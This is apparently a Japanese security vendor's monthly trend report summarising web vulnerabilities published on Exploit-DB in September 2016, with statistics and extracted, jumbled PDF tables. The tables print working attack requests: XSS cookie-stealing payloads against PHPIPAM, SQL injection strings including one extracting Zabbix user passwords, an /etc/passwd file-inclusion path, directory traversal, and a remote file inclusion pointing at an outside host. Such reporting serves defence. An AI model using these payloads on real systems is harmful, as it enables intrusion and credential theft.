2016.09 EDB-Report 最新Web脆弱性トレンドレポート(2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 2016年9月に公開されたExploit-DBの分析結果、クロスサイトスクリプティング(Cross Site Scripting、以下XSS)攻撃に対する脆弱報告件数が最も多かったです。発見されたXSS攻撃のほとんどは、オープンソースIP管理シス テムであるPHPIPAMから発見されました。PHPIPAMから発見された攻撃を分析した結果、パラメータ値を変調させてスクリプトを挿入する単純な攻撃種類がほとんどでした。SQL Injection攻撃もPHPIAMから発見されましたが、 これも攻撃の危険度および難易度が高い攻撃ではありませんでした。しかし、脆弱性が発見されたページがかなり多く、追加的な攻撃にさらされる可能性があるので、PHPIPAMを使用する管理者はセキュアコーディングおよびセキュリ ティアップデートが必要と見られます。また、今月はExponent CMSから特異なSQL Injection脆弱性が発見されました。ほとんどのSQL Injection攻撃は、パラメータ値を狙うようになっていましたが、今回発見された脆弱性は、 一般的なパラメータキーや値の構造ではなく、URL経路に攻撃するパターンでした。これは一般的には成功できない脆弱性だが、サイトの構造によって攻撃が成功できる脆弱性です。Exponent CMSと同じく、サイトにURL経路を 利用してどのような行為をするなら、必ず注意しなければならない部分であるため、関連攻撃コードを参考にして脆弱性が露出されないよう注意しなければなりません。 脆弱性別報告件数 1. 脆弱性別件数 脆弱性カテゴリ ローカルファイル挿入 (Local File Inclusion:LFI) リモートファイル挿入 (Remote File Inclusion:RFI) ディレクトリトラバーサル (Directory Traversal) SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 件数 30 1 25 1 20 1 15 10 7 5 26 0 36 ローカルファイル挿入 (Local File Inclusion:LFI) ディレクトリトラバーサル (Directory Traversal) リモートファイル挿入 (Remote File Inclusion:RFI) SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : XSS) 危険度別件数 2. 危険度別件数 危険度 早急対応要 高 合計 件数 割合 2 34 36 6% 94% 100% 2 早急対応要 高 34 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 中 易 合計 2 1 33 36 6% 3% 92% 100% 攻撃実行の難易度別件数 2 1 難 中 易 33 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 PHPIPAM Kajona Jobberbase Joomla Wordpress Matrimonial Website Script Exponent CMS Zabbix AnoBBS CumulusClips 件数 23 3 2 2 1 1 1 1 1 1 合計 36 主なソフトウェア別脆弱性発生件数 1 1 PHPIPAM 1 1 1 Kajona 1 Jobberbase 2 Joomla Wordpress 2 Matrimonial Website Script 3 23 Exponent CMS Zabbix AnoBBS CumulusClips EDB-Report 最新Web脆弱性トレンドレポート(2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-09-05 2016-09-06 2016-09-06 EDB番号 40333 40338 40338 脆弱性カテゴリ LFI SQL Injection XSS 攻撃難脆弱性度 易 易 易 危険度 対象プログラム 対象環境 高 WordPress RB Agency Plugin /wp-content/plugins/rb2.4.7 - forcedownload.php LFI agency/ext/forcedownload.php?file=../../../../../../../../etc/pa sswd 脆弱性 Wordpress WordPress RB Agency Plugin 2.4.7 高 POST /phpipam/app/tools/user-menu/user-edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - user-edit.php Content-Type: application/x-www-form-urlencoded SQL Injection 脆弱性 real_name=phpIPAM+Admin&email=admin%40domain.lo cal&password1=&password2=&mailNotify=No&mailChan gelog=No&printLimit=30&lang=9'%20or%201=1-- PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 脆弱性名 PHPIPAM 1.2.1 /phpipam/app/admin/subnets/e dit.php XSS 脆弱性 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 POST /phpipam/app/admin/subnets/edit.php HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded sectionId=2&subnetId=1&action=edit"><SCRIPT>ALERT( DOCUMENT.COOKIE);</SCRIPT> POST /phpipam/app/admin/widgets/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded /phpipam/app/admin/widgets/e dit.php XSS 脆弱性 wid=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT> &action=edit POST /phpipam/app/admin/scan-agents/edit.php PHPIPAM 1.2.1 HTTP/1.1 /phpipam/app/admin/scan- Host: agents/edit.php XSS 脆弱性 Content-Type: application/x-www-form-urlencoded id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE) POST /phpipam/app/admin/groups/edit-group.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/admin/groups/e Content-Type: application/x-www-form-urlencoded dit-group.php XSS 脆弱性 id=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>& action=edit POST /phpipam/app/admin/users/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded /phpipam/app/admin/users/edit .php XSS 脆弱性 id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE) PHPIPAM 1.2.1 /phpipam/app/admin/tags/edit. php XSS 脆弱性 ;</SCRIPT> POST /phpipam/app/admin/tags/edit.php HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE) ;</SCRIPT> POST /phpipam/app/admin/instructions/preview.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/admin/instructio Content-Type: application/x-www-form-urlencoded ns/preview.php XSS 脆弱性 instructions=You+can+write+instructions+under+admin+ menu!"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT> POST /phpipam/app/admin/languages/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded /phpipam/app/admin/sections/ edit.php XSS 脆弱性 2016-09-06 攻撃コード sectionId=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SC RIPT>&action=edit POST /phpipam/app/admin/subnets/edit-folder.php HTTP/1.1 Host: PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded /phpipam/app/admin/subnets/e dit-folder.php XSS 脆弱性 sectionId=1&subnetId=5&action=edit"><SCRIPT>ALERT( DOCUMENT.COOKIE);</SCRIPT>&location=IPaddresses POST /phpipam/app/admin/devices/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded /phpipam/app/admin/devices/e dit.php XSS 脆弱性 switchId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.C OOKIE);</SCRIPT> POST /phpipam/app/admin/device-types/edit.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/admin/device- Content-Type: application/x-www-form-urlencoded types/edit.php XSS 脆弱性 tid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE );</SCRIPT> EDB-Report 最新Web脆弱性トレンドレポート(2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-09-06 EDB番号 40338 脆弱性カテゴリ XSS 攻撃難脆弱性度 易 危険度 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 脆弱性名 PHPIPAM 1.2.1 /phpipam/app/admin/vlans/edit .php XSS 脆弱性 攻撃コード POST /phpipam/app/admin/vlans/edit.php HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded vlanId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIP T>&action=edit&vlanNum= POST /phpipam/app/admin/vlans/edit-domain.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/admin/vlans/edit Content-Type: application/x-www-form-urlencoded -domain.php XSS 脆弱性 id="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&a ction=add POST /phpipam/app/admin/nameservers/edit.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/admin/nameserv Content-Type: application/x-www-form-urlencoded ers/edit.php XSS 脆弱性 nameserverId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE); </SCRIPT>&action=edit POST /phpipam/app/admin/custom-fields/filter.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/admin/custom- Content-Type: application/x-www-form-urlencoded fields/filter.php XSS 脆弱性 table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE );</SCRIPT> POST /phpipam/app/admin/replace-fields/result.php HTTP/1.1 Host: PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded /phpipam/app/admin/replacefields/result.php XSS 脆弱性 field=description"><SCRIPT>ALERT(DOCUMENT.COOKIE); </SCRIPT>&search=a&csrf_cookie=892d2a900ec7fc1ba94 86ec171a36f71&replace=a POST /phpipam/app/admin/subnets/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded /phpipam/app/admin/subnets/e dit.php XSS 脆弱性 sectionId=1&subnetId=6&action=edit&location=IPaddres ses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT> POST /phpipam/app/admin/subnets/edit-folder.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/admin/subnets/e Content-Type: application/x-www-form-urlencoded dit-folder.php XSS 脆弱性 sectionId=2&subnetId="><SCRIPT>ALERT(DOCUMENT.C OOKIE);</SCRIPT>&action=add&location=IPaddresses POST /phpipam/app/tools/devices/devices-print.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/tools/devices/de Content-Type: application/x-www-form-urlencoded vices-print.php XSS 脆弱性 ffield=hostname"><SCRIPT>ALERT(DOCUMENT.COOKIE); </SCRIPT>&fval=a&direction=hostname%7Casc POST /phpipam/app/tools/subnet-masks/popup.php HTTP/1.1 PHPIPAM 1.2.1 Host: /phpipam/app/tools/subnet- Content-Type: application/x-www-form-urlencoded masks/popup.php XSS 脆弱性 closeClass=hidePopups"><SCRIPT>ALERT(DOCUMENT.CO OKIE);</SCRIPT> 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 2016-09-06 40338 XSS 易 高 PHPIPAM 1.2.1 - /phpipam/ XSS 脆弱性 2016-09-06 40338 SQL Injection 易 高 PHPIPAM 1.2.1 - /phpipam/ SQL Injection 脆弱性 /phpipam/?page=tools§ion=changelog&subnetId=a &sPage=50"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SC RIPT> /phpipam/?page=tools§ion=changelog&subnetId=a &sPage=50'%20or%201=1-- 対象プログラム 対象環境 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 PHPIPAM PHPIPAM 1.2.1 EDB-Report 最新Web脆弱性トレンドレポート(2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-09-07 EDB番号 40343 脆弱性カテゴリ XSS 攻撃難脆弱性度 易 危険度 高 脆弱性名 攻撃コード 対象プログラム 対象環境 CumulusClips CumulusClips 2.4.1 Jobberbase Jobberbase 2.0 Jobberbase Jobberbase 2.0 Zabbix Zabbix 2.0 POST /progs/bbs_auth.php?prog_dir=http://hack.com/index.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 AnoBBS AnoBBS 1.0.1 /kajona/xml.php?admin=1&module=messaging&action=s aveConfigAjax&systemid=&class_messageprovider_excepti ons_enabled=false<a Kajona 4.7 - xml.php XSS 脆弱 xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fx 性 html'><a%3abody onload%3d'alert(1)'%2f><%2fa>&messageprovidertype=c lass_messageprovider_exceptions Kajona Kajona 4.7 Kajona Kajona 4.7 Kajona Kajona 4.7 Exponent CMS Exponent CMS 2.3.9 Joomla Joomla Component Huge-IT Video Gallery 1.0.9 POST / HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* CumulusClips 2.4.1 Content-Type: application/x-www-form-urlencoded; /cumulusclips/account/videos/e charset=UTF-8 dit/1358/ XSS 脆弱性 title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E& tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E &cat_id=1&description=www%3Cscript%3Ealert%281%29 %3C%2Fscript%3E&private_url=DyZbn8m&submitted=TR UE&button=Update+Video 2016-09-08 2016-09-08 40351 40351 XSS XSS 易 易 高 高 /api/api.php?action=getJobs&type=0&category=0&count Jobberbase 2.0 - api.php SQL =5&random=1&days_behind=1'%20and%201=1-Injection 脆弱性 &response=js POST /admin/ HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Jobberbase 2.0 - /admin/ XSS Chrome/16.0.912.75 Safari/535.7 脆弱性 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username="><script>alert(1)</script> jsrpc.php?sid=0bcd4ade648214dc&type=9&method=scre en.get×tamp=1471403798083&mode=2&screenid= 2016-09-08 40353 SQL Injection 難 早急対応要 Zabbix 2.0 - 3.0.3 - SQL Injection &groupid=&hostid=0&pageFile=history.php&profileIdx= web.item.graph&profileIdx2=%28select%201%20from%20 %28select%20count%28%2A%29%2Cconcat%28%28select %28select%20concat%28cast%28concat%28alias%2C0x7e %2Cpasswd%2C0x7e%29%20as%20char%29%2C0x7e%29 %29%20from%20zabbix.users%20LIMIT%20%22%2Bstr%2 8userid1%29%2B%22%2C1%29%2Cfloor%28rand%280%29%2A2 %29%29x%20from%20information_schema.tables%20grou p%20by%20x%29a%29&updateProfile=true&screenitemid =&period=3600&stime=20160817050632&resourcetype= 17&itemids[23297]=23297&action=showlatest&filter=&fil ter_task=&mark_color=1 2016-09-16 40388 RFI 易 高 2016-09-19 40395 XSS 易 高 2016-09-19 40395 Directory Traversal 易 高 2016-09-19 40395 XSS 易 高 2016-09-22 40412 SQL Injection 中 高 2016-09-22 2016-09-22 2016-09-26 40413 40416 40423 SQL Injection SQL Injection SQL Injection 易 難 易 高 AnoBBS 1.0.1 - bbs_auth.php RFI 脆弱性 Kajona 4.7 - image.php /kajona/image.php?image=/files/images/upload/....//....//.... Directory Traversal 脆弱性 //download.php&maxWidth=20&maxHeight=2 Kajona 4.7 - index.php XSS 脆 /kajona/index.php?admin=1&module=search&action=sea 弱性 rch&peClose=1&peRefreshPage=';alert(1);foo=' Exponent CMS 2.3.9 /exponent/index.php'%20or%201%3d1--%20 index.php SQL Injection 脆弱性 /index.php?option=com_eventbooking&view=calendar&la Joomla Component Huge-IT yout=weekly&date=1%20or%201=1--&Itemid=354 Video Gallery 1.0.9 - index.php SQL Injection 脆弱性 /viewfullprofile1.php?id=MM57711%20and%20%2F*%213 0000if%28exists%28select%20concat%280x7233646D3076 Matrimonial Website Script Matrimonial 335F73716C5F696E6A656374696F6E%2Ccount%28*%29% 早急対応要 1.0.2 - viewfullprofile1.php SQL Website 29%20from%20%3F%3F%3F.%E7%AE%A1%E7%90%86%E Injection 脆弱性 Script 5%91%98%29%2CBENCHMARK%281161102%2C8%2CMD 5%280x41%29%29%2C0%29*%2F /index.php?option=com_eventbooking&view=calendar&la yout=weekly&date=1%20or%201=1--&Itemid=354 Joomla! Component Event 高 Booking 2.10.1 - index.php SQL Injection 脆弱性 Joomla Matrimonial Website Script 1.0.2 Joomla! Component Event Booking 2.10.1
© Copyright 2024 ExpyDoc